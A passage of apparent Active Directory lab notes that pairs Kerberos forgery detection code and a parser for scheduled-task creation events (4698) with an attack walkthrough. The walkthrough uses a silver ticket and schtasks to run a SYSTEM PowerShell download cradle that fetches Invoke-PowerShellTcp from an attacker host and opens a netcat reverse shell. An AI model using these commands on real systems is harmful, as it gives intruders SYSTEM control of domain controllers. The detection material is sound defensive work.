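    for e in (x for x in events if x["id"] == 4769):
        same = [c for c in tgts if _user(c) == _user(e) and c["IpAddress"] == e["IpAddress"]]
        if not _preceded_by(e, same, window):
            hits.append(e)
    return hits


def logon_without_tgs(events, window=MAX_TGT_LIFETIME):
    """Silver-ticket signal: a Kerberos network logon (4624) with no 4769 for that user and client
    naming the host's machine account as the service."""
    tgs = [e for e in events if e["id"] == 4769]
    hits = []
    for e in events:
        if e["id"] != 4624 or e.get("AuthenticationPackageName") != "Kerberos" or e.get("LogonType") != "3":
            continue
        svc = e["host"].upper() + "$"
        same = [c for c in tgs if _user(c) == _user(e) and c["IpAddress"] == e["IpAddress"]
                and c["ServiceName"].upper() == svc]
        if not _preceded_by(e, same, window):
            hits.append(e)
    return hits


def rc4_tickets(events):
    """Weak signal: RC4-HMAC (0x17) tickets. Tickets forged with /rc4 keys use it, but so do legacy clients."""
    return [e for e in events if e["id"] in (4768, 4769) and e.get("TicketEncryptionType") == "0x17"]


if __name__ == "__main__":
    for name, fn in (("TGS without TGT", tgs_without_tgt),
                     ("logon without TGS", logon_without_tgs),
                     ("RC4 ticket", rc4_tickets)):
        for hit in fn(EVENTS):
            print(f"[{name}] {hit['time']} event {hit['id']} user={_user(hit)} from={hit['IpAddress']}")
```

In production the 4768/4769 stream has to be collected from every DC (a client may obtain its TGT from one DC and its service ticket from another), the silver-ticket rule needs the 4624 events from the member servers, not only the DC, and the RC4 rule should be scoped to accounts and hosts that are known to support AES.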

## Getting a reverse TCP shell by creating a scheduled task with the silver ticket

With the `HOST/dcorp-dc.dollarcorp.moneycorp.local` ticket in the cache, `schtasks.exe` authenticates to the Task Scheduler service on the DC with Kerberos, so we can register and run a task as SYSTEM there. The task action is a PowerShell download cradle that fetches `Invoke-PowerShellTcp.ps1` from our web server at 172.16.100.23. Invoke-PowerShellTcp.ps1 only defines a function, so the hosted copy has to end with a call such as `Invoke-PowerShellTcp -Reverse -IPAddress 172.16.100.23 -Port 6969` for the DC to connect back to the listener. Delete the task when done (`schtasks /Delete /S dcorp-dc.dollarcorp.moneycorp.local /TN "Tareita" /F`); its creation is recorded on the DC regardless (Security event 4698 and the Task Scheduler operational log).

{% code overflow="wrap" lineNumbers="true" %}

```
PS C:\AD\Tools\tickets> schtasks /create /S dcorp-dc.dollarcorp.moneycorp.local /SC Weekly /RU "NT Authority\SYSTEM" /TN "Tareita" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.23/Invoke-PowerShellTcp.ps1''')'"
SUCCESS: The scheduled task "Tareita" has successfully been created.

PS C:\AD\Tools\tickets> schtasks /Run /S dcorp-dc.dollarcorp.moneycorp.local /TN "Tareita"
SUCCESS: Attempted to run the scheduled task "Tareita".
```

{% endcode %}

On the listener side, netcat on port 6969 receives the connection from the DC (172.16.2.1) and the shell runs as SYSTEM:

```
C:\AD\Tools\netcat-win32-1.12>nc -lvp 6969
listening on [any] 6969 ...
172.16.2.1: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [172.16.100.23] from (UNKNOWN) [172.16.2.1] 61506: NO_DATA
Windows PowerShell running as user DCORP-DC$ on DCORP-DC
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32>whoami
nt authority\system
```
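As an added example (not from the original notes), the matching detection for this step: a parser for the Security event 4698 (scheduled task created) that inspects the task XML carried in `TaskContent` and flags tasks that run as SYSTEM with a PowerShell download-and-execute cradle, like the one registered above. The two events are constructed; the XML is an approximation of what `schtasks.exe` writes (real events also contain Triggers and Settings elements), the benign task and its `srvadmin` creator are made up, and the field and function names are ours.

```python
import re
import xml.etree.ElementTree as ET

TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
SYSTEM_IDS = {"S-1-5-18", "SYSTEM", "NT AUTHORITY\\SYSTEM"}
CRADLE_TERMS = ("downloadstring", "downloadfile", "invoke-webrequest", "iwr ", "invoke-expression",
                "iex", "-enc", "-encodedcommand", "frombase64string", "http://", "https://")

# Constructed 4698 event mirroring the task created above (SYSTEM + PowerShell download cradle).
SAMPLE_4698 = {
    "id": 4698, "host": "dcorp-dc", "SubjectUserName": "Administrator", "SubjectDomainName": "DOLLARCORP",
    "TaskName": "\\Tareita",
    "TaskContent": """<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Principals><Principal id="Author"><UserId>S-1-5-18</UserId><RunLevel>HighestAvailable</RunLevel></Principal></Principals>
  <Actions Context="Author"><Exec>
    <Command>powershell.exe</Command>
    <Arguments>-c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.23/Invoke-PowerShellTcp.ps1''')'</Arguments>
  </Exec></Actions>
</Task>""",
}

# Constructed benign task for comparison: a backup job running as a named account.
BENIGN_4698 = {
    "id": 4698, "host": "dcorp-dc", "SubjectUserName": "srvadmin", "SubjectDomainName": "DOLLARCORP",
    "TaskName": "\\Maintenance\\NightlyBackup",
    "TaskContent": """<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Principals><Principal id="Author"><UserId>DOLLARCORP\\srvadmin</UserId><LogonType>Password</LogonType></Principal></Principals>
  <Actions Context="Author"><Exec><Command>C:\\Windows\\System32\\robocopy.exe</Command><Arguments>D:\\data \\\\dcorp-mgmt\\backup /MIR</Arguments></Exec></Actions>
</Task>""",
}


def _strip_decl(xml_text):
    """Drop the <?xml ...?> declaration: TaskContent declares UTF-16, which ElementTree rejects on a str."""
    if xml_text.lstrip().startswith("<?xml"):
        return xml_text[xml_text.index("?>") + 2:]
    return xml_text


def parse_task_content(xml_text):
    """Return the principal the task runs as and its (command, arguments) Exec actions."""
    root = ET.fromstring(_strip_decl(xml_text))
    run_as = root.findtext("t:Principals/t:Principal/t:UserId", default="", namespaces=TASK_NS)
    actions = [(ex.findtext("t:Command", default="", namespaces=TASK_NS),
                ex.findtext("t:Arguments", default="", namespaces=TASK_NS))
               for ex in root.findall("t:Actions/t:Exec", TASK_NS)]
    return {"run_as": run_as, "actions": actions}


def analyze_4698(event):
    """Score one 4698 event: high = cradle running as SYSTEM, medium = cradle, info = nothing found."""
    task = parse_task_content(event["TaskContent"])
    reasons, urls = [], []
    if task["run_as"].upper() in SYSTEM_IDS:
        reasons.append("runs as SYSTEM")
    for cmd, args in task["actions"]:
        line = (cmd + " " + args).lower()
        if "powershell" in line or "pwsh" in line:
            reasons.append("powershell action")
        hits = [t for t in CRADLE_TERMS if t in line]
        if hits:
            reasons.append("download/exec cradle: " + ", ".join(hits))
        urls += re.findall(r"https?://[^\s'\"()]+", cmd + " " + args)
    cradle = any(r.startswith("download/exec cradle") for r in reasons)
    severity = "high" if cradle and "runs as SYSTEM" in reasons else "medium" if cradle else "info"
    return {"host": event["host"], "task": event["TaskName"],
            "creator": f"{event['SubjectDomainName']}\\{event['SubjectUserName']}",
            "run_as": task["run_as"], "reasons": reasons, "urls": urls, "severity": severity}


if __name__ == "__main__":
    for ev in (SAMPLE_4698, BENIGN_4698):
        r = analyze_4698(ev)
        print(f"{r['severity']:<6} {r['host']} {r['task']} by {r['creator']} as {r['run_as']}: "
              f"{'; '.join(r['reasons']) or 'nothing suspicious'} {r['urls']}")
```

Event 4698 is only written when the "Audit Other Object Access Events" subcategory is enabled on the host; the Microsoft-Windows-TaskScheduler/Operational log (event 106, task registered) is an alternative source when it is not. The `SubjectLogonId` of the 4698 can be joined to a type-3 4624 to show that the task was registered over the network, as it was here.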

